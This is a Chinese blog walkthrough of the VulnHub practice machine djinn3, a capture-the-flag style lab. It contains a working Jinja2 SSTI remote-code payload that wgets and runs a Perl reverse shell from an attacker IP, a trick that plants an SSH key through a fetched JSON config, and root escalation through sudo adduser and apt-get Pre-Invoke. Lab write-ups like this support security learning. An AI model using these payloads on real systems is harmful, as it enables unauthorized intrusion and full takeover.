vulnhub靶机:djinn3

最新推荐文章于 2024-07-08 22:09:55 发布
最新推荐文章于 2024-07-08 22:09:55 发布
阅读量697 收藏 30
点赞数 25
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waitagirl/article/details/137024790
版权

一:信息收集

1:主机发现

2:端口扫描

nmap -sV -p- -T4 10.9.23.26

3:端口探测

1:访问80端口,没有找到有用的信息

2:访问5000端口,提到一个默认用户guest

3:nc连接31337端口,需要输入用户名和密码,尝试刚刚的guest/guest,成功登录,这个是和5000端口相关联的,在这里创建,5000端口用于显示

nc 10.9.23.26 31337

反复测试发现存在ssti漏洞

SSTI (Server-Side Template Injection) 漏洞是一种常见的Web应用程序漏洞,允许攻击者在服务器端注入恶意代码到应用程序的模板中。这种漏洞通常发生在使用模板引擎的Web应用程序中,攻击者可以利用这个漏洞执行任意代码,包括读取敏感数据、控制服务器等。

在twig模板会以乘积结果显示,而jinja2中则是以乘方显示

{{7*'7'}}

二:渗透测试

1:漏洞利用

https://github.com/swisskyrepo/PayloadsAllTheThings

找到jinja2的那个payload

以上结果说明ssti引擎是jinja2,网上搜集jinja2的反弹shell,搜索ssti的payload,得到

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

把id改成wget,然后加上我们攻击机的反弹shell文件,使用perl,注意要改下文件里的ip和端口

路径/usr/share/webshells/perl/perl-reverse-shell.pl,使用的时候需要修改文件中的ip,并将文件复制到根目录下

最终我们要使用的payload就是下面这个

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('wget http://10.9.23.112/perl-reverse-shell.pl;perl perl-reverse-shell.pl')|attr('read')()}}

然后把上面的内容放在31337端口新建的ticket里面,kali用python开启http服务,然后进入5000端口,点击link即可得到shell

打开nc监听

反弹成功

python提权

python -c "import pty;pty.spawn('/bin/bash')"

2:ssh

然后把pspy64上传到靶机的tmp目录里,pspy64是检测主机的进程工具,运行发现存在两个py文件,搜索saint的文件

发现存在两个py文件,搜索saint的文件

find / -user saint 2>/dev/null

根据这两个python程序的源码,在/tmp下新建一个文件,文件名字为25-03-2024.config.json,内容如下,本地服务器的authorized_keys文件的内容是使用ssh-keygen生成的id_rsa.pub文件内容

{
"URL":"http://10.9.23.112/authorized_keys",
"Output":"/home/saint/.ssh/authorized_keys"

}

用ssh-keygen工具生成id_rsa.pub和id_rsa文件,keys文件就是id_rsa.pub的内容,然后kali开启http服务(这里由于靶机创建文件比较难,可以在kali新建json文件,然后靶机去下载)

等待片刻,进入kali的/root/.ssh目录下,直接连接saint用户即可

ssh saint@10.9.23.26

3:提权

执行sudo -l,发现可以免密执行adduser命令,添加一个root组的用户

查看sudoers文件,查看还有哪些用户可以使用sudo执行命令,发现一个jason用户,但是这个用户并不存在,但是我们是可以新建用户的,所以需要密码(自己的密码)才能执行这个也就没有问题

sudo adduser choudan -gid=0

exit退回到saint用户,新建jason用户

切换到jason用户,使用apt-get命令提权

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

靶机结束

不言君
关注
  • 25
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2181
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2975
Vulnhub靶机渗透学习——DC-9
SSTI靶场
qq_63928796的博客
06-21 1001
SSTI,又称服务端模板注入攻击。jinja2模板中使用{}语法表示一个变量,它是一种特殊的占位符。当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换。但是在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell等问题首先看一下__class__用python试一下输出了 说明''是str类另外还有其他类型str(字符串)、dict(字典)、tuple(元组)、list(列表),这些类型的基类都是object,...
关于SSTI模板注入漏洞利用工具开发
全栈胖叔叔
05-08 748
因为参加CTF比赛,随手写了一个通用的SSTI模板注入工具,可以用于执行脚本和基本命令。演示地址为测试靶机地址。 上图中已经把文件目录结构爆出来了,读文本文件直接爆出Flag …
Vulnhub靶机:DJINN_ 1
LainWith的博客
02-03 1506
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
vulnhub靶机-djinn3
臭nana的博客
07-01 1650
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2039
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
vulnhub靶机-djinn
臭nana的博客
06-27 936
1、找到靶机ip:192.168.0.108
vulnhub靶机:djinn2
waitagirl的博客
03-22 1913
vulnhub靶机:djinn2
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Linux】进程间通信——匿名管道
最新发布
2201_76024104的博客
07-08 1102
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
建立共享linux第三方软件仓库
Znj1421304181的博客
07-08 195
【代码】建立共享linux第三方软件仓库。
Linux 系统安全加固:深入 SELinux 与 AppArmor
weixin_39372311的博客
07-08 842
SELinux 和 AppArmor 是两款强大的 Linux 安全模块,它们可以帮助你加固 Linux 系统安全,防止未经授权的访问和恶意行为。通过学习它们的原理、配置和使用方法,你可以更好地保护 Linux 系统安全,确保其稳定运行。
Linux系列2】Cmake安装记录
kewaqi618的博客
07-08 1022
主要介绍Cmake的安装方法,及自己安装的过程
vulnhub靶机系列:
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值